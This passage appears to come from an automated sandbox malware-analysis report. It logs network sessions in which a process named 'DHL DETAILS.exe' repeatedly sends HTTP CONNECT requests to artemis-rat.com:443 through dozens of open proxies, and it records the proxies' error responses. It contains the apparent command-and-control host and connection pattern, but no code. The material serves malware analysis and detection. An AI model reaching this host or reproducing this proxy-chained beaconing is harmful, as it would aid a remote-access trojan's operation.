                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.2</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1188192.168.2.55346960.188.102.225180806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.653763056 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1189192.168.2.5535123.21.101.15831286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.653769970 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.870390892 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1190192.168.2.55348191.107.180.250806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.654639959 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1191192.168.2.553523206.220.175.241456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.654807091 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192192.168.2.553120171.244.140.160345596352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.654827118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.723980904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.724174023 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:29.833566904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1193192.168.2.55348851.75.125.208270296352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.656162024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1194192.168.2.55346881.250.223.126806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.656162024 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.967299938 CET805INHTTP/1.1 500 Internal Server Error
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                    Content-Length: 613
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1195192.168.2.553582104.19.171.188806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.657176971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.811680079 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1196192.168.2.553531135.148.10.161411466352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.657327890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333241940 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.224018097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.724416971 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1197192.168.2.553589203.161.32.242506406352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.658039093 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.130117893 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.724081039 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.724334002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.833435059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1198192.168.2.55163745.117.179.179178276352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.658554077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.703572035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1199192.168.2.553236167.86.69.142363946352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.665743113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.723983049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1200192.168.2.55172051.15.139.15163796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.687813044 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.703572035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1201192.168.2.551661202.142.159.204310266352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.691028118 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1202192.168.2.55354320.210.113.32806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.691502094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.955601931 CET314INHTTP/1.1 403 Forbidden
                                                                                    Server: squid
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 17
                                                                                    X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                    X-Cache: MISS from cdn-fintech.info
                                                                                    X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                    Connection: close
                                                                                    Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                    Data Ascii: ERR_ACCESS_DENIED


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1203192.168.2.553501188.166.17.1888816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.691745996 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1204192.168.2.55356938.54.95.1980606352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.694957018 CET193OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Mar 9, 2024 13:14:19.918087006 CET39INHTTP/1.1 200 Connection established


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1205192.168.2.553655172.67.182.165806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.695816040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.850866079 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1206192.168.2.553656104.19.247.62806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.696266890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.851035118 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:17 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1207192.168.2.55328058.234.116.197806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.697402954 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.011396885 CET166INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1208192.168.2.553587209.142.64.219397896352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.701771021 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:18.333340883 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.036691904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:20.536640882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1209192.168.2.5537178.219.135.234436352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.705547094 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1210192.168.2.55333536.134.91.8288886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:17.705869913 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:19.380187035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:22.380136013 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
